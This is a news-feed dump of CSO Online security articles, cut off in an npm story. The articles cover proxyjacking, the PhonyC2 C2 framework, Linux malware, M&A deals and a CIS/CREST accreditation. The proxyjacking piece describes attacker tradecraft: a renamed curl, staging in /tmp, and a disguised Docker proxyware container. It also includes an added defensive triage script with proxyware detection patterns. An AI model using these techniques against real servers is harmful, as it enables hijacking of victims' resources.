CSO Online feed, Thu, 23 Feb 2023 14:37:47 +0000. Copyright (c) 2023 IDG Communications, Inc.

Shifting security left: DevSecOps meets virtualization Sat, 01 Jul 2023 08:30:00 +0000

The practice of shifting security left has its roots in DevOps, an agile methodology designed to reduce the time it takes for software projects to go from concept to production. By taking a proactive approach to secure development, organizations can reduce the risk of cyber attacks and system outages due to malicious actors or accidental errors. As such, shifting security left has become an increasingly important part of modern software development.

At the same time, virtualization technology has revolutionized the way software development is done, and DevSecOps is no exception. Enterprises are moving security practices and accountability further left in the software development lifecycle (SDLC). By arming developers themselves with the ability to detect and prevent potential risks and threats in the early stages of the CI/CD workflow, new technologies, like Corellium, are also helping security teams scale their expertise and free up their time to focus on more complex security concerns. Virtualization enables DevSecOps teams to easily and continuously test for potential vulnerabilities in a safe, secure environment.

Corellium's virtual mobile and IoT devices make it possible to identify security issues while software is still in development. Virtualization gives developers the ability to quickly deploy isolated environments for testing software before it's released into production. Applying security testing early and continuously throughout development makes it possible to catch vulnerabilities before they become major issues. It also saves developers the time and effort required to fix issues discovered late in the development cycle.

Reduce costs and ship on time with early detection

Did you know it can cost up to 100 times more to fix an issue discovered late in the SDLC than if you find and fix it early? Given the costs, why hasn't security been a bedrock of modern software development all along?

In the early days of software development, most attacks required physical access to a terminal on the machine running the application, which meant a lower risk of software being manipulated by someone on the outside. In the years that followed, enterprises adopted new software development methodologies, yet security was rarely prioritized within the SDLC. Instead, organizations assigned application security to dedicated security teams and testing took place after an application's release. This can leave potential vulnerabilities exposed to attackers for exploitation for weeks or even months.

Over time, most companies have adopted pre-release security testing to reduce the number of potential vulnerabilities released in their applications, a process that often takes several weeks to complete and whose unpredictable outcome could cost you dearly. A security test might find a few vulnerabilities or bugs that can be fixed in a few hours or days, or it might find dozens or hundreds of issues. Depending on the vulnerability, fixing it could require significant changes or entire replacements of underlying components. And of course, once implemented, the fixes will also need to be retested for application requirements and security. This can--and often does--set developers back by weeks as they try to meet now-impossible release deadlines.

Fortunately, with today's virtualization technology, teams can receive quicker feedback using dedicated tools to build reports and share their findings, increasing the overall speed of development and deployment, as well as the agility of the team. Updates and patches can also be done within a tighter turnaround, leading to faster and more secure releases.

Increase individual and teamwork efficiency with more flexibility

Virtualization also makes DevSecOps more efficient by making it easier to provision and manage multiple environments. A hypervisor for Arm processor-based hardware, the technology behind this kind of virtualization, enables the creation of virtual versions of device hardware, from phones to IoT devices, for nearly unlimited R&D applications. Virtual machines can be quickly set up and scaled up for any changes that need to be implemented, without the time, costs, and risks associated with procuring and shipping physical devices.

With virtualization, developer, security, and testing teams work better and faster together through simplified snapshot, restore, and cloning functionality. Closer collaboration among these teams removes friction, creates a more secure development environment, and improves overall software quality.

The use of virtualization technology in DevSecOps has enabled greater security from the start, as well as shorter development cycles, reduced costs, and increased agility. Virtualization is essential for any team looking to take advantage of DevSecOps and ensure their mobile and IoT applications are not only more secure, but also built and tested efficiently.

Categories: Security
https://www.csoonline.com/article/643998/shifting-security-left-devsecops-meets-virtualization.html
Attackers add hacked servers to commercial proxy networks for profit Fri, 30 Jun 2023 20:49:21 +0000

Hackers are using commercial proxy networks that pay users for their bandwidth to monetize their illegally obtained access to servers. Dubbed proxyjacking, this type of abuse has been increasingly observed alongside other forms of abusing hacked servers, such as cryptojacking.

“Although the concept of proxyjacking is not new, the ability to easily monetize it as affiliates of mainstream companies is,” researchers from Akamai said in a report. “Providing a simple path to financial gain makes this vector a threat to both the corporate world and the average consumer alike, heightening the need for awareness and, hopefully, mitigation.”

The Akamai team recently investigated several campaigns in which attackers used compromised SSH credentials to deploy a series of scripts that turned the servers into proxy clients on the Peer2Profit and Honeygain networks.

Both services are advertised as passive income tools that allow users to share their unused bandwidth and IP address as part of a crowdsourced network of proxy servers that is then used by paying companies for data collection, advertising, and other activities. These are meant to be volunteer-based services that require users to install a client application on their computers or mobile phones.

“The scenario drastically changes when an application is deployed without the knowledge or consent of the user, effectively exploiting their resources,” the Akamai researchers said. “This is where the seemingly innocuous act of using these services pivots into the realm of cybercrime. The attacker, by commandeering multiple systems and their bandwidth, effectively amplifies their potential earnings from the service, all at the victims’ expense.”

The attack is similar in concept to cryptojacking, the act of using a machine’s computing resources to mine cryptocurrencies without the knowledge or approval of the system’s owner. Mining cryptocurrency is otherwise a legitimate activity that users can willingly opt into, and the mining software is generally free and open source. Attackers use the same software, but in an abusive way.

Proxyjacking via Docker containers

In the attacks observed by Akamai via its honeypot systems, attackers first logged in via SSH and executed a Base64-encoded Bash script. The goal of this script is to connect to an attacker-controlled server and download a file called csdark.css. Despite the name, this file is a compiled, renamed copy of curl, the widely used command-line tool for transferring data over URLs.

The executable is not detected by any antivirus engine on VirusTotal because it is a legitimate, unmodified build of curl, which is likely allowlisted as a system tool; renaming a trusted binary is enough to avoid attention. After curl is deployed on the system, the Bash script changes the working directory to a world-writable directory such as /dev/shm or /tmp, which is also usually executable by all users. It then downloads a Docker container image that comes preloaded and preconfigured with the Peer2Profit or Honeygain client along with the attacker's affiliate ID on that network, so the hijacked systems are registered under the attacker's account.

Before deploying the downloaded Docker container image under the name postfixd, the script checks whether competing containers, possibly deployed by other attackers, are running and stops any that are found. Postfix is a popular mail transfer agent (MTA) for Linux, so the attackers picked this name followed by d (for daemon) to make their container less conspicuous in the list of processes on the system.

Both Peer2Profit and Honeygain provide public Docker images for their clients and they are fairly popular with over a million downloads, so the attackers didn’t have to do much work to set up the environment and tools. The web server where attackers host their renamed curl executable seems to have been hacked and contains a cryptomining tool. This suggests the attackers behind these proxyjacking campaigns also engage in cryptojacking.

“In this particular campaign, we saw the use of SSH to gain access to a server and install a Docker container, but past campaigns have exploited web vulnerabilities as well,” the Akamai researchers said. “If you check your local running Docker services and find any unwanted resource sharing on your system, you should investigate the intrusion, determine how the script was uploaded and run, and perform a thorough cleanup.”
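As an added example, and not code from the Akamai report or from the campaign it describes, the following POSIX shell script performs the two triage checks that the advice above implies: flag running Docker containers whose image is a known proxyware client, or whose daemon-style name (such as postfixd) does not match the image it runs, and list executables staged in world-writable directories such as /dev/shm and /tmp. The proxyware image-name keywords and the sample `docker ps` output are constructed assumptions; the report does not give exact image names.

```sh
#!/bin/sh
# Added triage example for the proxyjacking pattern described above; this is not
# code from the Akamai report. The image-name keywords and the sample `docker ps`
# output are constructed assumptions for illustration.

# Assumption: substrings likely to appear in the image names of the proxyware
# clients named in the report (the report does not give exact image names).
PROXYWARE_KEYWORDS='peer2profit honeygain'

# sample_ps: constructed stand-in for
#   docker ps --format '{{.Names}}\t{{.Image}}'
# Mixes two proxyware containers, a daemon-named container with an unrelated
# image, and two legitimate services.
sample_ps() {
    printf '%s\t%s\n' \
        postfixd 'peer2profit/peer2profit_linux:latest' \
        web      'nginx:1.25' \
        hg       'HoneyGain/honeygain:latest' \
        bind     'internetsystemsconsortium/bind9:9.18' \
        sshd     'someuser/bandwidth-share:latest'
}

# flag_proxy_containers: reads name<TAB>image lines on stdin and prints
# "<name> <image> <reason>" for each container that deserves a closer look.
flag_proxy_containers() {
    tab=$(printf '\t')
    while IFS="$tab" read -r name image; do
        [ -n "$name" ] || continue
        lower_image=$(printf '%s' "$image" | tr 'A-Z' 'a-z')

        # Rule 1: the image itself is a known proxyware client.
        for kw in $PROXYWARE_KEYWORDS; do
            case "$lower_image" in
                *"$kw"*)
                    printf '%s %s proxyware-image\n' "$name" "$image"
                    continue 2   # next container
                    ;;
            esac
        done

        # Rule 2: the container is named like a system daemon ("postfixd",
        # "sshd") but its image does not mention that daemon. The report's
        # sample hid a proxyware container behind the name postfixd.
        case "$name" in
            *d)
                daemon=${name%d}
                case "$lower_image" in
                    *"$daemon"*) ;;
                    *) printf '%s %s name-image-mismatch\n' "$name" "$image" ;;
                esac
                ;;
        esac
    done
}

# list_exec_in_dirs: prints regular files with the owner execute bit set under
# the given directories. The report's script staged its renamed curl in a
# world-writable directory such as /dev/shm or /tmp; an executable there is
# rarely legitimate on a server.
list_exec_in_dirs() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" -xdev -type f -perm -100 2>/dev/null
    done
}

main() {
    printf '== containers worth investigating ==\n'
    # On a live host replace sample_ps with:
    #   docker ps --format '{{.Names}}\t{{.Image}}'
    sample_ps | flag_proxy_containers
    printf '== executables in staging directories ==\n'
    list_exec_in_dirs /dev/shm /tmp
}

main
```

Run it as root on the suspect host after swapping sample_ps for the real docker ps call shown in the comment. A hit on either check is a prompt to capture the container's image digest, the SSH authentication log entries around the time it was created, and a hash of any staged binary before cleanup; on its own it is a lead, not proof of compromise.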


Categories: Cybercrime
https://www.csoonline.com/article/644398/attackers-add-hacked-servers-to-commercial-proxy-networks-for-profit.html
Command-and-control framework PhonyC2 attributed to Iran’s Muddywater group Fri, 30 Jun 2023 12:05:05 +0000

A previously unseen command-and-control (C2) framework called PhonyC2 has been attributed to the Iranian state-sponsored group MuddyWater. 

The custom-made and continuously developed PhonyC2 was used by the threat actor in the exploitation of the Log4j vulnerability in the Israeli SysAid software, in the attack against Technion, an Israeli university, and in the ongoing attacks exploiting the PaperCut print management software, according to a report by Deep Instinct.

"At the beginning of May 2023, Microsoft's Twitter post mentioned they had observed MuddyWater exploiting CVE-2023-27350 in the PaperCut print management software," Deep Instinct said in its report, adding that while Microsoft did not share any new indicators, they noted that MuddyWater was using tools from prior intrusions to connect to their C2 infrastructure and referenced their blog on the Technion hack, which the researchers already established was using PhonyC2.

"About the same time, Sophos published indicators from various PaperCut intrusions they have seen. Deep Instinct found that two IP addresses from those intrusions are PhonyC2 servers based on URL patterns," Deep Instinct said. 

MuddyWater has been active since 2017 and is generally believed to be a subordinate unit within Iran's Ministry of Intelligence and Security. Its top targets include Turkey, Pakistan, the UAE, Iraq, Israel, Saudi Arabia, Jordan, the US, Azerbaijan, and Afghanistan. The group primarily conducts cyberespionage activities and intellectual property (IP) theft attacks; on some occasions, they have deployed ransomware on targets.

Custom-made PhonyC2

Three malicious PowerShell scripts that were part of an archive named PhonyC2_v6.zip were identified in April by Deep Instinct.

"The filename piqued our interest and we set out to discover if it was a known C2 framework. After a quick investigation, it was revealed that the C2 framework was found by Sicehice in a server with an open directory listing," Deep Instinct said in the report. 

Sicehice is an organization that automates the collection of cyberthreat intelligence from over 30 sources and enables users to search against the collected IPs.

PhonyC2, written in Python 3, has been in use since 2021. It is structurally and functionally similar to MuddyC3, a previous MuddyWater custom C2 framework written in Python 2.

"This C2 is a post-exploitation framework used to generate various payloads that connect back to the C2 and wait for instructions from the operator to conduct the final step of the 'Intrusion Kill Chain'," Deep Instinct said.

Attributing PhonyC2 to MuddyWater

Analysis showed that the server hosting PhonyC2 also held Ligolo, the tunneling tool bore, and the open source tool FRP (fast reverse proxy), all of which have previously been used by MuddyWater.

Additionally, the threat actor communicated with two IP addresses that Microsoft listed as C2 servers in the report it published on the Technion attack, which Microsoft attributed to MuddyWater.

"The combination of the presence of known MuddyWater tools on the server and the fact that the threat actor communicated with two IP addresses known to be used by MuddyWater raised suspicion that PhonyC2 is a framework used by MuddyWater," Deep Instinct said, warning that MuddyWater is continuously updating the C2 and changing TTPs to avoid detection.

In April, Microsoft detected destructive operations enabled by MuddyWater in both on-premises and cloud environments. Previous attacks by MuddyWater mainly impacted on-premises environments. However, in this case, Microsoft found the destruction of cloud resources as well.

Categories: Advanced Persistent Threats, Cyberattacks, Vulnerabilities
https://www.csoonline.com/article/644268/command-and-control-framework-phonyc2-attributed-to-irans-muddywater-group.html
Mission Linux: How the open source software is now a lucrative target for hackers Fri, 30 Jun 2023 10:56:12 +0000

Growing at close to 20% year-over-year, the Linux operating system market is expected to reach $22.15 billion in 2029, up from $6.27 billion in 2022, according to Fortune Business Insights. With growth come opportunities, and sometimes those opportunities are for threat actors.

Linux has gained significant popularity and broader adoption in various domains, including servers, cloud infrastructure, Internet of Things (IoT) devices, and mobile platforms.

The increased adoption of DevOps and modern applications is making Linux the platform of choice for servers, and hence developers are increasingly building for it.

"Linux powers critical infrastructure, servers, and cloud environments, making it an appealing target for attackers aiming to compromise sensitive data, disrupt services, or launch broader attacks," said Royce Lu, distinguished engineer at Palo Alto Networks. 

In 2022, Palo Alto Networks observed Linux malware samples increase by 18.3% compared to 2021. The trend continued: from December 2022 to May 2023, the peak daily number of encounters with malicious ELF files (the executable format used by Linux-based OSes) increased by almost 50%, according to Stefano Ortolani, threat research lead at VMware.

Weak security practices are making Linux systems vulnerable

Improper configuration or weak security practices, such as default or weak passwords, unpatched software, and unsecured network configurations, can leave Linux systems vulnerable to attack.

As more critical systems run on Linux, a ransomware attack against them becomes more disruptive to customers, which in turn lets attackers demand bigger ransoms.

"In addition to servers, millions of Internet of Things (IoT) devices run on Linux, effectively expanding the attack surface of organizations across all verticals, especially in critical infrastructure," Dean Houari, director of security technology and strategy at Akamai, APJ, said.

Ransomware groups such as Agenda, BlackCat, Hive, and RansomExx have also developed versions of their ransomware in the programming language Rust, which makes it easier for them to build variants that target Linux.

In March, the APT group Iron Tiger updated its malware to target the Linux platform. In April, the Chinese group Alloy Taurus launched a Linux variant of its PingPull malware. In May, a new variant of the IceFire ransomware began targeting Linux enterprise systems.

Another factor in the increase in attacks is vulnerabilities in applications that run on Linux. "We saw the Log4j attack because of a vulnerability in the Apache server. Apache runs on Linux as well and thus such vulnerabilities can also mean increased attacks," said Sharda Tickoo, technical director for India & SAARC at Trend Micro.

While ransomware targeting Linux-based systems has been on the rise, a huge share of encounters is still variants of Mirai repurposed to mine Bitcoins or Monero, Ortolani said. 

"As long as cryptocurrencies are easily fungible, we can expect more and more cybercriminals to take advantage of insufficiently protected systems," Ortolani said. 

Timely vulnerability patches required

While Linux systems were generally considered secure, analysts say the priority now is timely patching of vulnerabilities.

"The strategy used to infect Linux systems is different from Windows as Linux is more susceptible to vulnerabilities," Houari said. "The high number of Linux vulnerabilities and dependency on open source code is a challenge for security teams to ensure that they are patched in a timely manner, which could allow attackers to gain access to these systems, effectively bypassing the perimeter security and obtaining privileged access for further reconnaissance and attacks."

Organizations must adopt a zero trust strategy to embed security into the infrastructure so that it is possible to systematically address the threat vectors at all levels thereby reducing the overall attack surface, according to Ortolani. Organizations need to have strong authentication and access controls, monitor and log activities, utilize security-hardening techniques, and educate users about best practices for using Linux systems securely.

Categories: Malware, Open Source, Ransomware
https://www.csoonline.com/article/644240/mission-linux-how-the-open-source-software-is-now-a-lucrative-target-for-hackers.html
Top cybersecurity M&A deals for 2023 Fri, 30 Jun 2023 09:00:00 +0000

Uncertainty and instability marked the end of 2022 for many in the tech sector, a trend that bled into the beginning of 2023. Following on the heels of a drought in IT talent came mass layoffs at many of the world's biggest tech companies as predictions of recession loomed and war in Ukraine dragged on with no end in sight.

Global concern over cybersecurity has never been higher, with attacks coming fast and furious and in ever-growing numbers, and 65% of organizations planned to increase cybersecurity spending in 2023. That means CISOs may be pressured to do more with what they have as budgets shrink even as demand for security increases. And they should be aware of what could change if one of their vendors is acquired in this climate.

Corporate deals have dropped from the highs of 2021 as investors proceed with caution, eyeing interest rate increases and the possibility of a recession. There were some indications that cybersecurity might be an outlier in 2023, with M&A activity remaining a little more robust than in other parts of the tech world. "There are abundant opportunities for innovation in cybersecurity as new technology breakthroughs, such as the near-human capabilities of ChatGPT, introduce new and largely unaddressed security risks," DataTribe noted in its fourth-quarter 2022 Insights.

While recognizing the ever-growing importance of cybersecurity and the ever-growing demand to protect against increasingly sophisticated--and numerous--bad actors, dealmakers are likely to be active but cautious in the year to come. 

Below are the deals that CSO has selected as the most significant of the year. (This list is updated periodically as new deals are announced.)

Thales agrees to buy Tesserent

June 13: Defense technology and security provider Thales has agreed to buy Australian cybersecurity firm Tesserent in a deal that values the firm at about $111 million. Paris-based Thales said the deal will enable it to "accelerate its cybersecurity development roadmap and expand its footprint in Australia and New Zealand." Tesserent will continue to operate under its current name, but its branding will include the "Cyber Solutions by Thales" tagline. "With the acquisition of Tesserent and its highly skilled team of cyber experts, and combined with our own system engineering experts, Thales Australia will establish an Australian/New Zealand leader in Cyber Defence able to best protect the country and its national infrastructure from cyber threats," Thales Australia CEO Jeff Connolly said in a release.

Informatica announces intent to acquire Privitar

Informatica has agreed to buy Privitar with the intention of integrating its access controls and remediation for data privacy and security into Informatica’s AI-powered Intelligent Data Management Cloud platform. Privitar is a "UK-based data management access and privacy software provider that powers organizations to democratize the ethical and safe use of data across enterprises," Informatica said in a statement. "Data governance and responsible use of data is a growing priority for large businesses, but too often requires trading off agility and self-service," said Informatica CEO Amit Walia.

Dataprise acquires Texas-based managed service provider RevelSec

June 21: Dataprise, a provider of managed IT, cybersecurity, and cloud solutions, has acquired RevelSec for an undisclosed amount. RevelSec, a security-first managed service provider headquartered in Texas, will "further expand Dataprise's national footprint and add high-value vertical expertise while providing RevelSec clients access to Dataprise's broad portfolio of powerhouse services," the companies said in a statement. RevelSec serves 200 clients across industries including financial services, healthcare, and oil and gas.

Daisy Corporate Services completes acquisition of ECSC Group

June 22: Daisy Corporate Services has completed its acquisition of breach prevention, detection and response support company ECSC Group. In a statement on its website, Daisy said the purchase "provides highly complementary services" to its "current operational resilience offerings, therefore providing an enhanced customer proposition." Founded in 2000, ECSC provides expert security breach prevention, detection and response support to almost 425 customers across all sectors and including a range of corporate and blue-chip organizations. "We firmly believe that together we will become the UK's leading cyber security organization," said ECSC CEO Matthew Briggs.

Socure buys Berbix for $70 million

June 27: Digital identity verification solutions provider Socure has acquired San Francisco-based startup Berbix for about $70 million. Berbix, founded in 2018 by former members of the Airbnb Trust and Safety Team, has developed a high-accuracy document verification solution with a forensics engine able to detect spoofed IDs, including AI-generated fakes.

Mozilla buys fake-busting software firm Fakespot

May 2: Not-for-profit tech foundation Mozilla has bought fake-busting software developer Fakespot. Fakespot uses artificial intelligence (AI) and machine learning (ML) systems to detect patterns and similarities between reviews to flag those that are most likely to be deceptive. The system helps sort real reviews from fake ones, to support trust and confidence among those making online purchases. Mozilla said it will continue to invest in enhancing Fakespot for current users but plans to develop future Fakespot integrations that will be unique to Mozilla's Firefox browser.

Private equity firm acquires Absolute Software for $657 million

May 11: Crosspoint Capital Partners has agreed to buy self-healing, intelligent security solutions provider Absolute Software for US$657 million excluding debt, in a deal that will take the NASDAQ-traded company private. "We are impressed with how Absolute has built upon its asset visibility and control heritage and expanded into solutions that provide endpoint resilience and the reliable access needed in today's hybrid work environments," Crosspoint managing partner Greg Clark said in a statement. Absolute's products maintain a persistent digital connection to endpoints that dynamically applies visibility, control, and self-healing capabilities to devices, applications, and network connections.

Exiger acquires software supply chain and SBOM management platform Ion Channel

May 16: Security software as a service provider Exiger has bought software supply chain risk management platform Ion Channel. The acquisition will expand Exiger's depth of analysis in vendor and open-source software cyber risk, CEO Brandon Daniels said in a statement. "From entities to software to raw materials, Exiger's technology now covers all potential product risk so our customers can regain control of their supply chains." Ion Channel has developed a proprietary risk model that analyzes 1.5 trillion events in open-source and proprietary software components daily and tracks more than 100 leading risk indicators to detect security and operational risk months in advance of known vulnerabilities. Ion Channel's C-SCRM solution will be incorporated into Exiger's FedRAMP SaaS platform.

IBM acquires Polar Security

May 16: Tech giant IBM has acquired data security posture management (DSPM) provider Polar Security to bolster its cloud security offerings. Polar Security's platform helps to manage "shadow data," sensitive data not being tracked or managed by a company. DSPM reveals where sensitive data is stored, who has access to it, and how it's used, and identifies weaknesses in the underlying security posture, including policies, configurations, or data usage. Polar Security's DSPM technology will be integrated into IBM's Guardium family of data security products.

Onfido buys digital identity-sharing technology developer Airside Mobile

May 22: Automated identity verification company Onfido has acquired Airside Mobile. Airside is noted as among the first to bring user-controlled digital identity to the travel industry. The company's privacy-first identity management technology will be combined with Onfido's verification platform to allow "verify once, use anywhere" use where customers can manage their own digital identity stored on a smartphone.

Cisco plans to buy Armorblox to help create "an AI-first Security Cloud."

May 31: Cisco has agreed to purchase email security platform Armorblox for an undisclosed amount. Cisco security Chief Product Officer Raj Chopra said Armorblox's use of predictive and generative AI "will change the way our customers understand and interact with their security control points." In a blog announcing the pending acquisition, Chopra said Armorblox's techniques may also be applied to attack prediction, rapid threat detection, and efficient policy enforcement.

OpSec Security agrees to buy Zacco

April 4: Brand integrity firm OpSec Security has agreed to buy Danish intellectual property management and protection company Zacco, the two companies said in a statement. Zacco combines traditional legal expertise with digital brand management and security. The addition of Zacco will "combine the respective strengths of the two businesses to help customers maximize the value of their IP portfolios, take advantage of new opportunities, and counter vulnerabilities and threats these may bring," OpSec said.

TrustCloud and Branddocs merge

April 11: In a reverse takeover, secure digital transaction and video verification services provider Branddocs acquired secure digital transaction choreographing platform TrustCloud for an undisclosed amount. The new company will operate as TrustCloud, combining Branddocs' client base and in-house network of fraud detection experts, AI/ML technologies, multi-orchestration capabilities, and the TrustCloud modular platform to deliver globally compliant, frictionless, and vendor-agnostic services.

Columbus acquires ICY Security

April 11: Columbus has acquired ICY Security in an expansion aimed at meeting customer demand for cyber security services. Denmark-based ICY Security is among the Nordic countries' largest consultancies and implementation companies in the area of identity and access management (IAM). "The acquisition of ICY Security is an important investment in extending Columbus' offerings following the increased need for cybersecurity services from our customers," Columbus CEO and President Søren Krogh Knudsen said in a statement.

Akamai acquires Neosec

April 19: Content delivery network and cloud security services provider Akamai Technologies has agreed to buy privately held API detection and response platform Neosec. The acquisition will extend Akamai's visibility into the rapidly growing API threat landscape, the company said in a statement. "The combination is designed to make it easy for customers to secure their APIs by helping them discover all of their APIs, assess their risk, and respond to vulnerabilities and attacks."

Cisco agrees to buy Lightspin Technologies

March 29: Software and service giant Cisco has agreed to buy privately held cloud security software provider Lightspin Technologies for an undisclosed amount. Lightspin offers end-to-end cloud security posture management (CSPM) across cloud-native resources. The company will join Cisco's emerging technologies and incubation (ET&I) business.

Mastercard acquires Baffin Bay

March 20: Mastercard has bought Swedish cybersecurity firm Baffin Bay to increase its cloud-based protections. The company will integrate Baffin Bay's cloud-based solution, which uses AI technology to automatically filter and counteract malicious internet traffic, into its current offerings. "The addition of Baffin Bay Network's instantaneous, predictive and cloud-based AI technology to our existing analytical capabilities will deliver a leading, singular cyber solution," Mastercard said in a statement.

HPE acquires Axis Security

March 2: Hewlett Packard Enterprise (HPE) agreed to buy cloud security services provider Axis Security, its third acquisition since January, to deliver a unified secure access service edge (SASE) offering. The acquisition is aimed at incorporating the Axis security service edge (SSE) platform into HPE's edge-to-cloud network security capabilities to deliver integrated networking and security solutions as-a-service. HPE plans to integrate Atmos, an SSE offering by Axis Security, into Aruba, its platform for edge-to-cloud networking with AI-based network automation. "The convergence of Aruba and Axis Security solutions will transform edge-to-cloud connectivity with a comprehensive SASE solution that provides enterprises with the highest levels of security for both IoT devices and all users' access across geographically distributed locations," Phil Mottram, executive vice president and general manager, HPE Aruba Networking said in a statement.

Online auction giant eBay Acquires 3PM Shield

February 13: eBay acquired 3PM Shield, a provider of monitoring solutions designed to prevent the sale of counterfeit items, unsafe products and illegal goods. The purchase will help provide sellers and buyers with a safe and trusted platform and enhances eBay’s ability to address suspicious or harmful seller behavior and potentially problematic items. "3PM Shield has been a valued and effective external partner in helping eBay tackle these challenges and we look forward to unlocking additional capabilities as we bring their technologies in-house," eBay Chief Risk Officer Zhi Zhou said in a statement.

Accenture buys Brazil-based Morphus

February 13: New York-based Accenture has acquired privately held cyber defense, risk management, and cyber threat intelligence services provider Morphus for an undisclosed amount. Brazil-based Morphus provides red and blue team services; governance, risk, and compliance services; enterprise risk management; cyber strategy; threat intelligence; and managed security services. "The acquisition brings more than 230 highly skilled professionals, making Accenture one of the largest cybersecurity professional services providers in Brazil," Accenture Security global leader Paolo Dal Cin said in a statement. The acquisition launches Accenture's cyber industry practice in Latin America.

Vista Equity Partners completes acquisition of KnowBe4

February 1: Investment firm Vista Equity Partners completed its acquisition of security awareness training and simulated phishing platform KnowBe4 for $24.90 per share in cash, valuing the company at about $4.4 billion. "The human element remains one of the most important yet neglected aspects of cybersecurity," Michael Fosnaugh, co-head of Vista's Flagship Fund and senior managing director, said in a press release. "The opportunity to scale a business that is truly mission-critical to enterprises around the world is core to Vista's investment approach and value creation efforts." Vista focuses exclusively on acquiring enterprise software, data, and technology-enabled businesses.

Radiant Logic signs definitive agreement to acquire Brainwave GRC

February 1: California-based Radiant Logic entered into a definitive agreement to acquire French identity governance and analytics company Brainwave to accelerate the companies' shared vision of an identity data fabric using data science to ensure the right information is in place to make the right policy decisions. "Demand is increasing for cybersecurity, governance, and compliance solutions that help companies address the continually evolving security threats, especially as regulatory environments and fines become more prevalent," said Joe Sander, CEO of Radiant Logic, in a press release. The companies said the acquisition will strengthen their market positions as identity, analytics, and intelligence experts and provide a zero-trust and identity-first security foundation to deliver enhanced data security, reduced audit and compliance costs, and improved understanding and visibility of malicious activity.

Veridos becomes majority shareholder in NetSeT

January 30: Berlin-based Veridos has acquired a majority stake in NetSeT Global Solutions, a move the company says will strengthen its position as a full-service provider of integrated identity solutions. NetSeT, based in Serbia, develops information systems for the management of citizen data and information security. In 2017, Veridos acquired a minority stake in NetSeT, which will now be integrated into the Veridos Group. "With this acquisition, we are expanding our position as a provider of holistic identity solutions to cover the entire value chain: from citizen registration to the creation and personalization of ID documents and the management of citizen data to document verification," Veridos CEO Marc-Julian Siewert said in a press release. The move comes after 20 years of collaboration between Veridos and NetSeT. In joint projects, the companies have cooperated in providing the ID system for North Macedonia, ePassport systems for Bangladesh, Venezuela, and the United Arab Emirates, and a driver's licence system for Uganda.

Simeio acquires identity and access management firm PathMaker

January 10: Specialized identity and access management (IAM) services provider Simeio acquired Texas-based identity governance firm PathMaker Group in a move that will enhance Simeio's consulting services and SailPoint implementation capabilities, the company said. "This acquisition solidifies our commitment to integrate future-ready technologies to protect and secure identities," Simeio CEO Chris Schueler said in a press release. "I am very confident in the unmatched identity security services that our clients can take advantage of as a result of this acquisition." Simeio operates a portfolio of end-to-end services in advisory, building, and managing identity security solutions. PathMaker's IAM MAP assessment process and methodology will be incorporated into Simeio's proprietary identity orchestration platform Simeio IO, allowing customers to continuously measure and assess the maturity of their identity programs. Simeio's managed identity security services delivered through Simeio IO will also be accessible to PathMaker clients.

Data and Information Security, IT Leadership, Mergers and Acquisitions, Security
https://www.csoonline.com/article/574521/top-cybersecurity-manda-deals-for-2023.html
Center for Internet Security, CREST launch new enterprise cybersecurity accreditation scheme Thu, 29 Jun 2023 17:42:29 +0000

The Center for Internet Security (CIS) and international information security certification body CREST have announced a new joint cybersecurity accreditation initiative for organizations. The CIS Controls Accreditation program aims to provide companies a way to show customers and partners that their cybersecurity posture meets the best practice guidance as set forth in the CIS Critical Security Controls (CIS Controls), a set of globally recognized best practices for improving an enterprise's cybersecurity posture, the pair said. It is the first initiative pairing the CIS Controls with a program to deliver accredited consulting, they added.

Earlier this month, CREST announced a 50% discount for small businesses based in lower income countries as part of its mission to help reduce inequality in access to cyber defenses. The discount, including all associated membership and accreditation fees across all disciplines, will apply to eligible new member applicants and on renewal for current members, CREST said. In April, CREST also published a new guide to fostering financial sector cyber resilience in developing countries, outlining the need for appropriate, multi-party cyber resilience testing to ensure better cyber safety in developing nations, along with advice for governing authorities.

CIS Controls Accreditation: an organizational-level cybersecurity "stamp of approval"

The CIS Controls Accreditation is an opportunity for CIS SecureSuite Members (Controls, Consulting & Services, and Product Vendor) and CREST members to demonstrate that their implementation of security best practices is guided and externally assessed in accordance with the training and validation defined by two authorities in cybersecurity, read a press release. The program offers service providers a "stamp of approval" at the organization level, assuring that their customers can feel confident that they are doing business with a reputable and reliable CIS Controls assessment organization, wrote CIS. The scheme is priced at $1,500 USD for members and $2,500 USD for non-members.

The ability to digest all the data and controls from various devices and systems is essential in this massive shift to evidencing security, said Tom Brennan, executive director, CREST Americas Region. "Together, CIS Controls and CREST accreditations give our joint members an accelerated path to meet risk and compliance requirements in addition to providing a methodology for continuously monitoring their security posture. By using CREST on top of the CIS Controls, security professionals can monitor security from infrastructure that can be observed, tested, and enhanced."

The new accreditation is a significant step forward in efforts to secure enterprises and safeguard against current and emerging threats, according to Curtis Dukes, CIS executive VP and general manager, Security Best Practices.

New accreditation welcome, but has narrow technical focus

The new accreditation is a welcome one for the IT industry, says Kevin Curran, IEEE senior member and professor of cybersecurity at Ulster University. "CIS Controls are important because they help companies reduce risk, meet compliance requirements, prioritize resources effectively, and cover multiple security domains," he tells CSO.

They also provide a systematic and structured approach to mitigating the most dangerous cyber threats, and by implementing them, companies can reduce their exposure to a wide range of common attacks and vulnerabilities, he adds. "By following these controls, organizations can enhance their security posture and better protect their critical assets and information."

However, the scheme's narrow focus on technical control assessment limits the value it will bring to organizations, James Bore, cybersecurity hygienist and consultant, tells CSO. "There are a lot of schemes like this out there, under different branding and with different levels of marketing. Looking purely at the assessment of technical controls is of limited benefit to organizations who should be looking at more comprehensive frameworks to solve what are ultimately security governance issues," he argues.

Adding certifications to an already over-crowded and inconsistent field does not help anyone, he adds. "Really what's needed is more effort to rationalize the standards and certifications we have, improve understanding of the relevant governance areas, and focus on what's genuinely effective."

Certifications, IT Skills
https://www.csoonline.com/article/644174/center-for-internet-security-crest-launch-new-enterprise-cybersecurity-accreditation-scheme.html
Npm ecosystem vulnerable to new manifest confusion attack Thu, 29 Jun 2023 16:57:00 +0000

The npm (Node Package Manager) ecosystem of JavaScript packages has a by-design bug that attackers could exploit to hide malicious dependencies and install scripts inside packages. The issue, dubbed manifest confusion, stems from the fact that the registry does not enforce consistency between the manifest a publisher submits alongside a package and the package.json metadata file inside the package tarball itself.

The issue was publicly disclosed this week by Darcy Clarke, a former staff engineering manager for the npm CLI team. Clarke left GitHub, which owns npm, in December, but he said GitHub has been aware of this issue since November, and he notified them again in March when, after independent research, he came to the conclusion that the impact is greater than originally thought.

